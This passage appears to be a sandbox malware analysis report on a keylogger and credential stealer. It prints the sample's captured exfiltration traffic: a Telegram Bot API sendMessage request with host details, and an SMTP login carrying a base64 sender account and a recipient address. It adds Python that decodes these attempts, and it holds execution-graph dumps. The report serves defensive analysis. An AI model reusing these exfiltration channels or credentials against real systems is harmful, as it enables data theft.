x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 32366
Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AkWgGN7qlnEtA9XojL3JzFKJ2ONlJ078Jxetto4%2FgdBAL9jNHvUFdmXh4k%2B994HUh9MnRQW3AuttHs3y7hfGPgvcVtEGWxy3VEymR%2B%2FOc%2FnJO%2FuWvUvkMjI54dd6mpG8uH0XAE6v"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dedf5dd0fdd6b89-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1465&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2130978&cwnd=251&unsent_bytes=0&cid=04aeb016f79e9be5&ts=170&x=0"
2024-11-07 14:19:48 UTC | 146 | IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e
Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-07 14:19:48 UTC | 213 | IN
Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID: 7 | Source: 192.168.2.8:49726 | Destination: 188.114.96.3:443 | PID: 3648 | Process: C:\Users\user\Desktop\Lpjrd6Wxad.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 14:19:50 UTC | 87 | OUT | GET /xml/173.254.250.79 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-07 14:19:51 UTC | 1221 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:51 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
x-amz-cf-pop: DFW57-P5
x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 32369
Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJcrnJMjjEDYub%2F1m0vTioX3f9ku9i%2FAy9VuwML9AFHHriPI%2FHlzBNY%2BOee93aQXGAscibxV%2FtgsvHRNtoWMSiLMezyHcf7UDvuIRC137SXRKY4v5Gq18c3s9ETQlWBlMNjXdN4l"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dedf5ec0f7a4794-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1210&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1839898&cwnd=234&unsent_bytes=0&cid=cc30eb71d147a109&ts=147&x=0"
2024-11-07 14:19:51 UTC | 148 | IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-07 14:19:51 UTC | 211 | IN
Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID: 8 | Source: 192.168.2.8:49727 | Destination: 149.154.167.220:443 | PID: 3648 | Process: C:\Users\user\Desktop\Lpjrd6Wxad.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 14:19:52 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2008/11/2024%20/%2006:12:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-11-07 14:19:52 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Thu, 07 Nov 2024 14:19:52 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-07 14:19:52 UTC | 55 | IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp | Source IP:Port | Destination IP:Port | Commands
Nov 7, 2024 15:19:58.450747013 CET | 208.91.198.143:587 | 192.168.2.8:49728 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 7, 2024 15:19:58.450997114 CET | 192.168.2.8:49728 | 208.91.198.143:587 | EHLO 210979
Nov 7, 2024 15:19:58.635401011 CET | 208.91.198.143:587 | 192.168.2.8:49728 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
Nov 7, 2024 15:19:58.636321068 CET | 192.168.2.8:49728 | 208.91.198.143:587 | AUTH login c2VzaWxlYnJ1Y2VAZWxlbWFjdWFlLmNvbQ==
Nov 7, 2024 15:19:58.799144983 CET | 208.91.198.143:587 | 192.168.2.8:49728 | 334 UGFzc3dvcmQ6
Nov 7, 2024 15:20:00.265482903 CET | 208.91.198.143:587 | 192.168.2.8:49728 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Nov 7, 2024 15:20:00.265752077 CET | 192.168.2.8:49728 | 208.91.198.143:587 | MAIL FROM:<sesilebruce@elemacuae.com>
Nov 7, 2024 15:20:00.430349112 CET | 208.91.198.143:587 | 192.168.2.8:49728 | 250 2.1.0 Ok
Nov 7, 2024 15:20:00.430538893 CET | 192.168.2.8:49728 | 208.91.198.143:587 | RCPT TO:<ilguerrii12@gmail.com>
Nov 7, 2024 15:20:00.609477043 CET | 208.91.198.143:587 | 192.168.2.8:49728 | 554 5.7.1 <ilguerrii12@gmail.com>: Relay access denied
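The Telegram request (session 8) and the SMTP exchange with 208.91.198.143:587 are the two exfiltration channels the sample tried, and both are readable without running the sample. The Python below is an added example for this report, not Joe Sandbox code and not code from the sample; its inputs are transcribed from the captured lines above, the `C:`/`S:` direction prefixes in the SMTP transcript are added here, and the constant and function names are this example's own. It shows that the Bot API path `/bot/sendMessage` carries an empty token and an empty `chat_id` (the Bot API form is `/bot<token>/<method>`), which is why api.telegram.org answered 404, and it base64-decodes the AUTH LOGIN exchange, where the username the sample presented is recoverable even though the login failed and the client's password line does not appear in the capture.

```python
"""Decode the sample's two exfiltration attempts seen in the report above.
Added example for this report (not Joe Sandbox code, not the sample's); inputs
are transcribed from the captured sessions."""
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Request line copied from session 8 (api.telegram.org, 149.154.167.220:443).
TELEGRAM_REQUEST_LINE = (
    "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0A"
    "Date%20and%20Time:%2008/11/2024%20/%2006:12:52%0D%0ACountry%20Name:%20"
    "United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you"
    "%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1"
)

# SMTP commands copied from the 192.168.2.8 <-> 208.91.198.143:587 exchange.
# "C:"/"S:" prefixes are added here; the client's password line is absent from
# the report, so it is not reconstructed.
SMTP_DIALOGUE = """\
S: 220 us2.outbound.mailhostbox.com ESMTP Postfix
C: EHLO 210979
S: 250-AUTH PLAIN LOGIN
C: AUTH login c2VzaWxlYnJ1Y2VAZWxlbWFjdWFlLmNvbQ==
S: 334 UGFzc3dvcmQ6
S: 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
C: MAIL FROM:<sesilebruce@elemacuae.com>
S: 250 2.1.0 Ok
C: RCPT TO:<ilguerrii12@gmail.com>
S: 554 5.7.1 <ilguerrii12@gmail.com>: Relay access denied
"""


def _b64(token: str) -> str:
    """Decode one base64 SMTP token (undecodable bytes become U+FFFD)."""
    return base64.b64decode(token).decode("utf-8", "replace")


def parse_telegram_request(request_line: str) -> dict:
    """Split a Bot API request line (/bot<token>/<method>?...) into its parts.

    An empty token or chat_id means the stealer's config is incomplete; the API
    answers such requests with 404, as the report shows.
    """
    http_method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    match = re.fullmatch(r"/bot([^/]*)/(\w+)", url.path)
    if match is None:
        raise ValueError(f"not a Telegram Bot API path: {url.path}")
    query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    return {
        "http_method": http_method,
        "bot_token": match.group(1),
        "api_method": match.group(2),
        "chat_id": query.get("chat_id", [""])[0],
        "text": query.get("text", [""])[0],
    }


def parse_smtp_auth_login(dialogue: str) -> dict:
    """Walk a C:/S: transcript and recover what AUTH LOGIN leaks.

    AUTH LOGIN sends username and password as separate base64 lines, each
    prompted by a base64 334 reply, so the username is readable from any
    capture even when the login fails or the password line is missing.
    """
    result = {"username": None, "server_prompts": [], "password_sent": False,
              "authenticated": False, "mail_from": None, "rcpt_to": [],
              "relay_denied": False}
    expecting = None  # which base64 line the client owes next: "username"/"password"
    for raw in dialogue.splitlines():
        side, _, line = raw.partition(": ")
        if side == "C":
            auth = re.fullmatch(r"AUTH\s+LOGIN(?:\s+(\S+))?", line, re.IGNORECASE)
            if auth:
                if auth.group(1):  # initial-response form: username inline
                    result["username"] = _b64(auth.group(1))
                    expecting = "password"
                else:
                    expecting = "username"
            elif expecting == "username":
                result["username"] = _b64(line)
                expecting = "password"
            elif expecting == "password":
                result["password_sent"] = True  # value deliberately not kept
                expecting = None
            elif (m := re.match(r"MAIL FROM:<([^>]*)>", line, re.IGNORECASE)):
                result["mail_from"] = m.group(1)
            elif (m := re.match(r"RCPT TO:<([^>]*)>", line, re.IGNORECASE)):
                result["rcpt_to"].append(m.group(1))
        elif side == "S":
            code = line[:3]
            if code == "334":
                result["server_prompts"].append(_b64(line[4:].strip()))
            elif code in ("235", "535"):
                result["authenticated"] = code == "235"
                expecting = None
            elif code == "554" and "Relay access denied" in line:
                result["relay_denied"] = True
    return result


if __name__ == "__main__":
    tg = parse_telegram_request(TELEGRAM_REQUEST_LINE)
    print(f"Telegram {tg['api_method']}: token={tg['bot_token']!r} chat_id={tg['chat_id']!r}")
    print(tg["text"])
    smtp = parse_smtp_auth_login(SMTP_DIALOGUE)
    print(f"SMTP user={smtp['username']} prompts={smtp['server_prompts']} "
          f"authenticated={smtp['authenticated']} relay_denied={smtp['relay_denied']}")
```

Running it prints the decoded message body (PC Name:210979, a date and time, and a Country Name that matches the <CountryName> in the reallyfreegeoip.org responses above) and, for SMTP, the username sesilebruce@elemacuae.com decoded from the AUTH login token together with the server prompt Password: decoded from the 334 and 535 replies. The 554 Relay access denied on RCPT TO is the consequence of the failed AUTH: Postfix accepted MAIL FROM but will not relay to a gmail.com address for an unauthenticated client, and the transcript ends there without a DATA command.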


Target ID: 0
Start time: 09:19:26
Start date: 07/11/2024
Path: C:\Users\user\Desktop\Lpjrd6Wxad.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Lpjrd6Wxad.exe"
Imagebase: 0x850000
File size: 274'432 bytes
MD5 hash: 2BA023727B7A6399471D26A38F26695A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false


Execution Graph

Execution Coverage: 11.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 64.3%
Total number of Nodes: 14
Total number of Limit Nodes: 3
execution_graph
Nodes (id: address, resolved API where present):
18150: 58293f0
18151: 582941d
18153: 582b2ff
18154: 5828aa8 LdrInitializeThunk
18155: 5829726
18156: 5828aa8
18157: 5828aba
18158: 58291e9 LdrInitializeThunk
18159: 5828abf
18160: 58290ac
18161: 58290a4 LdrInitializeThunk
18163: 5829201
18164: 5828aa8 LdrInitializeThunk
18165: 5828f63
Edges:
18150->18151, 18151->18153, 18151->18155, 18151->18156, 18154->18155, 18155->18153, 18155->18154, 18156->18157, 18156->18159, 18157->18155, 18158->18157, 18159->18157, 18159->18158, 18160->18165, 18161->18163, 18164->18165, 18165->18161, 18165->18164
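The execution graph above is dumped as one flattened string, which makes the node count and the resolved API calls hard to check by eye. The Python below is an added example for this report, not Joe Sandbox code; it assumes the token grammar visible in the dump (a decimal node id followed by a hex address and an optional API name, plus `a->b` edge tokens), which is inferred here and is not a documented Joe Sandbox format, and the function names are this example's own. It recovers the 14 nodes the report counts, finds the two entry nodes (18150 and 18160, the only nodes with no incoming edge) and shows that the only resolved import in this dynamically mapped region at 0x5820000 is LdrInitializeThunk.

```python
"""Parse the report's flattened execution_graph dump into nodes and edges.
Added example for this report (not Joe Sandbox code). The token grammar is
inferred from the dump: "<id> <hexaddr> [ApiName]" for nodes, "<id>-><id>"
for edges."""
import re

# Constructed input: the execution_graph string copied from the report.
EXECUTION_GRAPH_DUMP = (
    "execution_graph 18150 58293f0 18151 582941d 18150->18151 18153 582b2ff "
    "18151->18153 18155 5829726 18151->18155 18156 5828aa8 18151->18156 "
    "18154 5828aa8 LdrInitializeThunk 18154->18155 18155->18153 18155->18154 "
    "18157 5828aba 18156->18157 18159 5828abf 18156->18159 18157->18155 "
    "18158 58291e9 LdrInitializeThunk 18158->18157 18159->18157 18159->18158 "
    "18160 58290ac 18165 5828f63 18160->18165 18161 58290a4 LdrInitializeThunk "
    "18163 5829201 18161->18163 18164 5828aa8 LdrInitializeThunk 18164->18165 "
    "18165->18161 18165->18164"
)

EDGE = re.compile(r"(\d+)->(\d+)")


def parse_execution_graph(dump: str):
    """Return ({node_id: (address, api_or_None)}, [(src, dst), ...])."""
    tokens = dump.split()
    if not tokens or tokens[0] != "execution_graph":
        raise ValueError("expected an execution_graph dump")
    nodes, edges = {}, []
    i = 1
    while i < len(tokens):
        edge = EDGE.fullmatch(tokens[i])
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        node_id, address = int(tokens[i]), int(tokens[i + 1], 16)
        i += 2
        api = None
        # An API name follows the address only if the next token is neither a
        # decimal node id nor an edge (hex addresses never stand alone here).
        if i < len(tokens) and not tokens[i].isdigit() and not EDGE.fullmatch(tokens[i]):
            api = tokens[i]
            i += 1
        nodes[node_id] = (address, api)
    return nodes, edges


def roots(nodes, edges):
    """Nodes with no incoming edge: the graph's entry points."""
    targets = {dst for _, dst in edges}
    return sorted(n for n in nodes if n not in targets)


def reachable_apis(nodes, edges, start):
    """Resolved APIs reachable from `start` (depth-first, safe on cycles)."""
    successors = {}
    for src, dst in edges:
        successors.setdefault(src, []).append(dst)
    seen, stack, apis = set(), [start], set()
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        if nodes[node][1]:
            apis.add(nodes[node][1])
        stack.extend(successors.get(node, []))
    return sorted(apis)


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(EXECUTION_GRAPH_DUMP)
    print(f"{len(nodes)} nodes, {len(edges)} edges, entry nodes {roots(nodes, edges)}")
    for entry in roots(nodes, edges):
        print(f"from {entry} (0x{nodes[entry][0]:x}): {reachable_apis(nodes, edges, entry)}")
```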
Strings
Memory Dump Source
• Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
Similarity
• API ID:
• String ID: N
• API String ID: 0-1130791706
• Opcode ID: f4fedbbfcfe657bd42efaa58c2cdf9c9339486bc5124009ad5ca480186931e22
• Instruction ID: ed14e4eaf898cc215ad7eb495778521c430732378682a28b8b02de8c12869047
• Opcode Fuzzy Hash: f4fedbbfcfe657bd42efaa58c2cdf9c9339486bc5124009ad5ca480186931e22
• Instruction Fuzzy Hash: FE73E631D1075A8EDB11EF68C954A99FBB1FF99310F11C69AE44877221EB70AAC4CF81
Strings
Memory Dump Source
• Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
Similarity
• API ID:
• String ID: K
• API String ID: 0-856455061
• Opcode ID: 8582039cd3fef3df08a515c26d1d11289daf8410d144153b4974aae8565ec979
                                                                                                                                              • Instruction ID: 9724db2033c5ed9027b05b7df5f3d81ad7b1291b352dfb16d2f9a3e3c5b75166
                                                                                                                                              • Opcode Fuzzy Hash: 8582039cd3fef3df08a515c26d1d11289daf8410d144153b4974aae8565ec979
                                                                                                                                              • Instruction Fuzzy Hash: 9133D431D147198ADB11EF68C954A9DFBB1FF99300F11C69AE44CA7221EB70AAC5CF81

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 972 5828aa8-5828ab8 973 5828aba 972->973 974 5828abf-5828acb 972->974 975 5828beb-5828bf5 973->975 977 5828ad2-5828ae7 974->977 978 5828acd 974->978 981 5828bfb-5828c3b 977->981 982 5828aed-5828af8 977->982 978->975 999 5828c42-5828cf7 981->999 985 5828bf6 982->985 986 5828afe-5828b05 982->986 985->981 988 5828b32-5828b3d 986->988 989 5828b07-5828b1e 986->989 993 5828b4a-5828b54 988->993 994 5828b3f-5828b47 988->994 989->999 1000 5828b24-5828b27 989->1000 1003 5828b5a-5828b64 993->1003 1004 5828bde-5828be3 993->1004 994->993 1029 5828cf9 999->1029 1030 5828cfe-5828d94 999->1030 1000->985 1002 5828b2d-5828b30 1000->1002 1002->988 1002->989 1003->985 1009 5828b6a-5828b86 1003->1009 1004->975 1014 5828b8a-5828b8d 1009->1014 1015 5828b88 1009->1015 1016 5828b94-5828b97 1014->1016 1017 5828b8f-5828b92 1014->1017 1015->975 1019 5828b9a-5828ba8 1016->1019 1017->1019 1019->985 1023 5828baa-5828bb1 1019->1023 1023->975 1024 5828bb3-5828bb9 1023->1024 1024->985 1026 5828bbb-5828bc0 1024->1026 1026->985 1027 5828bc2-5828bd5 1026->1027 1027->985 1032 5828bd7-5828bda 1027->1032 1029->1030 1035 5828e33-5828e39 1030->1035 1032->1024 1033 5828bdc 1032->1033 1033->975 1036 5828d99-5828dac 1035->1036 1037 5828e3f-5828e57 1035->1037 1040 5828db3-5828e04 1036->1040 1041 5828dae 1036->1041 1038 5828e6b-5828e7e 1037->1038 1039 5828e59-5828e66 1037->1039 1043 5828e80 1038->1043 1044 5828e85-5828ea1 1038->1044 1042 5829201-58292fe 1039->1042 1057 5828e06-5828e14 1040->1057 1058 5828e17-5828e29 1040->1058 1041->1040 1049 5829300-5829305 1042->1049 1050 5829306-5829310 1042->1050 1043->1044 1045 5828ea3 1044->1045 1046 5828ea8-5828ecc 1044->1046 1045->1046 1053 5828ed3-5828f05 1046->1053 1054 5828ece 1046->1054 1049->1050 1063 5828f07 1053->1063 1064 5828f0c-5828f4e 1053->1064 1054->1053 1057->1037 1060 5828e30 1058->1060 1061 5828e2b 1058->1061 1060->1035 1061->1060 1063->1064 1066 5828f50 1064->1066 1067 5828f55-5828f5e 1064->1067 1066->1067 1068 5829186-582918c 1067->1068 1069 5829192-58291a5 1068->1069 1070 5828f63-5828f88 1068->1070 1073 58291a7 1069->1073 1074 58291ac-58291c7 1069->1074 1071 5828f8a 1070->1071 1072 5828f8f-5828fc6 1070->1072 1071->1072 1082 5828fc8 1072->1082 1083 5828fcd-5828fff 1072->1083 1073->1074 1075 58291c9 1074->1075 1076 58291ce-58291e2 1074->1076 1075->1076 1079 58291e4 1076->1079 1080 58291e9-58291ff LdrInitializeThunk 1076->1080 1079->1080 1080->1042 1082->1083 1085 5829063-5829076 1083->1085 1086 5829001-5829026 1083->1086 1089 5829078 1085->1089 1090 582907d-58290a2 1085->1090 1087 5829028 1086->1087 1088 582902d-582905b 1086->1088 1087->1088 1088->1085 1089->1090 1093 58290b1-58290e9 1090->1093 1094 58290a4-58290a5 1090->1094 1095 58290f0-5829151 call 5828aa8 1093->1095 1096 58290eb 1093->1096 1094->1069 1102 5829153 1095->1102 1103 5829158-582917c 1095->1103 1096->1095 1102->1103 1106 5829183 1103->1106 1107 582917e 1103->1107 1106->1068 1107->1106
Memory Dump Source
• Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e13e31eec986d5a0e7b654d8a6c9e44c48624c82284f806f393dd665ab84212a
• Instruction ID: 1ea0459842a8716a83b09f9b02876a10ce91c7e1c77e3aeb3b4ceecdb30f1774
• Opcode Fuzzy Hash: e13e31eec986d5a0e7b654d8a6c9e44c48624c82284f806f393dd665ab84212a
• Instruction Fuzzy Hash: 4C22F874E002288FDB14DFA9C984B9DBBB2BF84304F1481A9D849EB355DB359D86CF51
Strings
Memory Dump Source
• Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
Similarity
• API ID:
• String ID: K
• API String ID: 0-856455061
• Opcode ID: ccf8e56fff8f72f21f90deb5e09e8f6d1f0c44526880e8af2a094523301395ef
• Instruction ID: bcd869c1a559e3b6df878e6d62c1ff544dcd954a7a66d6a31afd9b715c677bde
• Opcode Fuzzy Hash: ccf8e56fff8f72f21f90deb5e09e8f6d1f0c44526880e8af2a094523301395ef
• Instruction Fuzzy Hash: C6B1E475D056198BDB14DFA9C8887DDBBB1FF89300F14C29AD408A7264EB74AAC5CF40
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f3c1c49132a7e5bf79b9fe186af8a80ed684e4c84dd601950a89d7a66fe4c8ad
• Instruction ID: 8bb43e9e1990068bd9bf9d6ecc849c9b6cf672633e85f25ba2f2afb6378cdcf7
• Opcode Fuzzy Hash: f3c1c49132a7e5bf79b9fe186af8a80ed684e4c84dd601950a89d7a66fe4c8ad
• Instruction Fuzzy Hash: 16127C70A002298FDB15DF69C894BAEBBF6BF88700F208559E846EB351DF359D45CB90

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 3208 1026fc8-1026ffe 3209 1027006-102700c 3208->3209 3347 1027000 call 10269a0 3208->3347 3348 1027000 call 1027118 3208->3348 3349 1027000 call 1026fc8 3208->3349 3210 102700e-1027012 3209->3210 3211 102705c-1027060 3209->3211 3214 1027021-1027028 3210->3214 3215 1027014-1027019 3210->3215 3212 1027062-1027071 3211->3212 3213 1027077-102708b 3211->3213 3218 1027073-1027075 3212->3218 3219 102709d-10270a7 3212->3219 3220 1027093-102709a 3213->3220 3345 102708d call 102a0f3 3213->3345 3346 102708d call 102a0f8 3213->3346 3216 10270fe-102713b 3214->3216 3217 102702e-1027035 3214->3217 3215->3214 3229 1027146-1027166 3216->3229 3230 102713d-1027143 3216->3230 3217->3211 3221 1027037-102703b 3217->3221 3218->3220 3222 10270b1-10270b5 3219->3222 3223 10270a9-10270af 3219->3223 3227 102704a-1027051 3221->3227 3228 102703d-1027042 3221->3228 3225 10270bd-10270f7 3222->3225 3226 10270b7 3222->3226 3223->3225 3225->3216 3226->3225 3227->3216 3231 1027057-102705a 3227->3231 3228->3227 3237 1027168 3229->3237 3238 102716d-1027174 3229->3238 3230->3229 3231->3220 3239 10274fc-1027505 3237->3239 3240 1027176-1027181 3238->3240 3241 1027187-102719a 3240->3241 3242 102750d-1027519 3240->3242 3247 10271b0-10271cb 3241->3247 3248 102719c-10271aa 3241->3248 3249 102751b 3242->3249 3250 102751d 3242->3250 3257 